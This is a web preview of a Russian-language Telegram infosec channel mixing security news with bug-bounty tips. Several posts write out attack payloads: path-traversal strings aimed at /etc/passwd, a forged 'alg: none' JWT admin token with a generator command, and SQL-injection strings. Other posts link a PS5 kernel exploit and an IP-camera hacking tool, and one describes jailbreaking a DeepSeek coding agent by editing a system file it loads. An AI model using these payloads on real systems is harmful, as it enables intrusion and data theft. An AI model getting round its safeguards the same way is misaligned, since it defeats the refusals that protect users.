TGViewer
Channel Public Channel
InfoSec Portal

InfoSec Portal

@cybersecinform

Присоединяйтесь к нашему каналу и погрузитесь в мир ИБ

Сотрудничество, реклама: @devmangx

Работаем с @Spiral_Yuri

РКН: https://clck.ru/3Fs4L9
Subscribers
19.3K
Photos
1.4K
Videos
234
Links
6.6K
Recent Posts 16 shown
Post #8511 472
Злоумышленники могли использовать iCloud, чтобы отправлять письма от имени любого адреса в домене icloud.com, включая tim.cook@icloud.com, при этом письма успешно проходили SPF, DKIM и DMARC — проверки подлинности почты, которые должны защищать от подмены отправителя.

Исследователи обнаружили и сообщили Apple о двух ошибках в обработке адресов на почтовых серверах компании.

Первое исправление Apple просто блокировало слово «admin». Полное исправление заняло 18 месяцев.

За находку исследователям выплатили $15 000.

https://sec-consult.com/blog/detail/from-anyoneicloudcom-spoofing-arbitrary-apple-icloud-identities/

👉 @cybersecinform
  • 🤯 5
Post #8509 957
Парень выложил на GitHub приложение, которое превращает ваш телефон в детектор слежки.

Оно слушает Wi-Fi и Bluetooth-сигналы вокруг и показывает, какие устройства находятся поблизости:

• скрытые трекеры
• полицейские нагрудные камеры
• дроны и местоположение их пилота
• умные очки Meta, когда они ведут запись
• микрофоны систем обнаружения выстрелов

Всего приложение распознаёт до 242 типов устройств и предупреждает, если какое-то из них начинает перемещаться вместе с вами.

Полностью открытый исходный код.


👉 @cybersecinform
  • 👍 12
  • ❤ 2
Post #8508 1.18K
OpenClaw только что запустила «Kubernetes для ИИ-агентов» при поддержке OpenAI, NVIDIA и Red Hat.

Проект называется OpenClaw Enterprise — это открытая плоскость управления для запуска ИИ-агентов в большом масштабе.

Можно развёртывать агентов, изолировать их, управлять доступом и контролировать всю инфраструктуру из одного места.

Также платформа добавляет мультитенантность, управление политиками и аудит для инфраструктуры агентов.

И всё это работает поверх Kubernetes.

Изначально проект появился внутри OpenAI, а затем перешёл в OpenClaw Foundation.

Источник: https://thenewstack.io/openclaw-enterprise-kubernetes-agents/

👉 @cybersecinform
  • ❤ 3
Post #8507 1.24K
Обход Path Traversal

Null Byte Injection
../../../etc/./passwd%00.png

Удаление ../
..././..././..././e../tc..//pas../swd

Многоэтапное декодирование
..%2%35%32F..%2%35%32F..%2%35%32Fetc%2%35%32F/passwd

Добавление для усечения по длине, 4096 байт
../../../etc/./passwd/././././././

👉 @cybersecinform
  • ❤ 9
Post #8506 1.36K
Обход JWT через alg: none без необходимости подписи.

Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJhZG1pbiJ9.

Соответственно измените нужные поля ниже:

echo -n '{"sub":"admin","role":"admin","admin":true}' | base64 | tr -d '=' | xargs -I{} echo "eyJhbGciOiJub25lIn0.{}."


#BugBounty #BrokenAuth

👉 @cybersecinform
  • ❤ 4
  • 💯 4
Post #8505 1.48K
Microsoft только что добавила в Windows встроенный способ запускать Linux-контейнеры.

WSL Containers официально вышел в стабильный релиз и позволяет собирать и запускать Linux-контейнеры прямо из Windows через wslc.

Среди ключевых изменений — изолированные контейнеры, более быстрый доступ к файлам между Windows и Linux и новая сетевая модель.

Поддержка Compose уже на подходе.

Linux-контейнеры в Windows теперь официально стали нативной возможностью Microsoft.

Полный анонс:
https://blogs.windows.com/windowsdeveloper/2026/09/29/wsl-containers-now-generally-available/

👉 @cybersecinform
  • ❤ 11
  • 👍 3
Post #8503 1.5K
СРОЧНО: вышел новый джейлбрейк, который взламывает все версии прошивки PS5 с 7.00 по 13.60. Первые тестировщики говорят, что он запускается за считанные секунды и работает даже на PS5 Pro.

Всё, что нужно, — открыть определённый сайт во встроенном браузере.

Эксплойт объединяет уязвимость WebKit в браузере с гонкой use-after-free в ядре, чтобы получить чтение и запись в памяти ядра, после чего загружает полезные нагрузки для homebrew и резервных копий игр.

https://github.com/ntfargo/Relapse-Exploit

👉 @cybersecinform
  • ❤ 8
Post #8502 1.56K
#sqli

payload:-djsb '+union+select+1,2,version()--+-

#bugbounty #bugbountytrics #infosec #xss #sqli

👉 @cybersecinform
  • ❤ 4
  • 😁 2
Post #8500 1.61K
Для поиска поддоменов можно использовать новые инструменты

crt.name/v1/search?apex

app.agniops.in/v1/search?doma

Простой, быстрый и удобный способ находить больше поддоменов.

Удачной охоты ❤️

#bugbountytips #bugbountytip #bugbounty

👉 @cybersecinform
  • ❤ 3
  • 🔥 3
  • 👍 2
  • 😁 1
Post #8497 1.86K
Официальный MCP-сервер для IDA уже вышел. Он бесплатный, с открытым исходным кодом и работает с любыми LLM.

Агент пишет код на IDAPython, расходует примерно на 20% меньше токенов и может работать с одной IDB-базой вместе с вами в реальном времени.

uvx ida-hcli mcp install

https://hex-rays.com/blog/hex-rays-ida-mcp-server

👉 @cybersecinform
  • ❤ 5
Post #8496 1.97K
Джейлбрейк DeepSeek V4.1 Flash: официальный API по-прежнему отказывает.

Обход сделали через рабочее пространство агента — изменили один системный файл, который кодовый агент загружает ещё до того, как вы что-либо вводите.

— Abliteration убирает отказы прямо на уровне весов модели.
— Здесь же взломали системные инструкции самого агента.

https://github.com/togg53192-cmd/jailbreaks/blob/main/deepseek-4-1.md

👉 @cybersecinform
  • ❤ 8
Post #8495 1.93K
PwnEye Tool

Инструмент для взлома камер видеонаблюдения, подключённых к сети IP-камер.

Возможности инструмента:

1. Поиск уязвимостей в камерах, использующих протоколы вроде ONVIF.
2. Возможность получать доступ к камерам и управлять ими, запускать прямую трансляцию, изменять интерфейс камеры, поворачивать её и получать доступ к настройкам.

https://github.com/Hackerest/pwneye

👉 @cybersecinform
  • ❤ 4
  • 👍 1
Post #8494 1.83K
Вот как находить SQL-инъекции в 100% случаев. 🔥

Для:
https://site.com/?q=HERE
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== конкатенация строк
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='


#bugbountytips #bugbountytip

👉 @cybersecinform
  • ❤ 8
Post #8493 1.85K
Прошивка Uniden SDS100E успешно расшифрована.

👉 @cybersecinform
  • ❤ 8
Older posts →

About this channel

How can I read @cybersecinform without a Telegram account?
TGViewer shows the public web preview Telegram publishes for InfoSec Portal: recent posts, photos, videos and the subscriber count, with no app, login or account.
How many subscribers does InfoSec Portal have?
InfoSec Portal (@cybersecinform) has 19.3K subscribers on Telegram, refreshed roughly every 30 minutes.
Does InfoSec Portal know I viewed it here?
No. Public channel previews carry no viewer identity, and TGViewer has no accounts or tracking of what you look up.
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →